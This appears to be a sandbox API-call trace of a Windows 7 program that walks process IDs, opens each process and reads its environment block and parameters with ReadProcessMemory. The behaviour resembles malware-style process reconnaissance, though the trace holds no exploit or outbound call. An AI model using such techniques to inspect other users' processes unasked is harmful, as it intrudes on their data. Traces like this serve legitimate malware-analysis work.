[0402.622] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.622] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x240
[0402.678] GetLastError () returned 0x0
[0402.678] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.678] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd6018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.678] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.679] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d27c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.679] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d2688, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.682] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.683] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.683] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd6020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.683] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.684] malloc (_Size=0x20) returned 0x2bff30
[0402.684] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d26ca, lpBuffer=0x2bff30, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bff30*, lpNumberOfBytesRead=0x0) returned 1
[0402.684] free (_Block=0x2bff30)
[0402.685] CloseHandle (hObject=0x240) returned 1
[0402.686] _ui64tow (_Value=0x4b0, _Buffer="1168", _Radix=10) returned="1200"
[0402.690] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1200") returned 4
[0402.691] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.692] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b0) returned 0x0
[0402.718] CloseHandle (hObject=0x0) returned 0
[0402.719] _ui64tow (_Value=0x778, _Buffer="1200", _Radix=10) returned="1912"
[0402.723] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1912") returned 4
[0402.724] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x124398, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.724] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x778) returned 0x240
[0402.762] GetLastError () returned 0x0
[0402.762] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.762] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x262820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626a6, lpBuffer=0x12dd100, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.764] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.765] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.765] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.765] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x261e90, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.766] malloc (_Size=0x32) returned 0x2be140
[0402.766] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626d6, lpBuffer=0x2be140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2be140*, lpNumberOfBytesRead=0x0) returned 1
[0402.766] free (_Block=0x2be140)
[0402.767] CloseHandle (hObject=0x240) returned 1
[0402.769] _ui64tow (_Value=0x628, _Buffer="1912", _Radix=10) returned="1576"
[0402.773] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1576") returned 4
[0402.775] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.775] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.812] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x628) returned 0x0
[0402.812] CloseHandle (hObject=0x0) returned 0
[0402.813] _ui64tow (_Value=0x2b0, _Buffer="1576", _Radix=10) returned="688"
[0402.818] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="688") returned 3
[0402.823] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.823] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.847] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b0) returned 0x0
[0402.848] CloseHandle (hObject=0x0) returned 0
[0402.849] _ui64tow (_Value=0x6a4, _Buffer="688", _Radix=10) returned="1700"
[0402.853] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1700") returned 4
[0402.855] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243b8, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.855] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x0
[0402.876] CloseHandle (hObject=0x0) returned 0
[0402.877] _ui64tow (_Value=0x73c, _Buffer="1700", _Radix=10) returned="1852"
[0402.881] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1852") returned 4
[0402.883] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.883] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x73c) returned 0x240
[0402.903] GetLastError () returned 0x0
[0402.903] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d29e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d2796, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.905] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.906] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d1ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.907] malloc (_Size=0x8a) returned 0x2c4740
[0402.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d2802, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0402.907] free (_Block=0x2c4740)
[0402.908] CloseHandle (hObject=0x240) returned 1
[0402.908] _ui64tow (_Value=0x728, _Buffer="1852", _Radix=10) returned="1832"
[0402.912] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1832") returned 4
[0402.923] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.923] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.951] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x728) returned 0x240
[0402.951] GetLastError () returned 0x0
[0402.951] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432a50, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4327e6, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.953] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.954] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431f40, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.954] malloc (_Size=0xa4) returned 0x2c4740
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432852, lpBuffer=0x2c4740, nSize=0xa2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0402.955] free (_Block=0x2c4740)
[0402.959] CloseHandle (hObject=0x240) returned 1
[0402.961] _ui64tow (_Value=0x978, _Buffer="1832", _Radix=10) returned="2424"
[0402.968] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2424") returned 4
[0402.969] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.969] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x240
[0402.997] GetLastError () returned 0x0
[0402.998] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d26ea, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.999] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.001] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.001] malloc (_Size=0x6e) returned 0x2c4740
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d2750, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.002] free (_Block=0x2c4740)
[0403.002] CloseHandle (hObject=0x240) returned 1
[0403.004] _ui64tow (_Value=0x980, _Buffer="2424", _Radix=10) returned="2432"
[0403.009] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2432") returned 4
[0403.014] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.014] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.046] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x240
[0403.046] GetLastError () returned 0x0
[0403.046] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.046] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26fa, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.048] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.049] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] malloc (_Size=0x70) returned 0x2c4740
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2762, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] free (_Block=0x2c4740)
[0403.051] CloseHandle (hObject=0x240) returned 1
[0403.052] _ui64tow (_Value=0x988, _Buffer="2432", _Radix=10) returned="2440"
[0403.057] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2440") returned 4
[0403.058] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service PaȰ\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.058] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.084] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x240
[0403.084] GetLastError () returned 0x0
[0403.085] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5126f0, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.087] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.088] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.088] malloc (_Size=0x8a) returned 0x2c4740
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512772, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.089] free (_Block=0x2c4740)
[0403.090] CloseHandle (hObject=0x240) returned 1
[0403.129] _ui64tow (_Value=0x990, _Buffer="2440", _Radix=10) returned="2448"
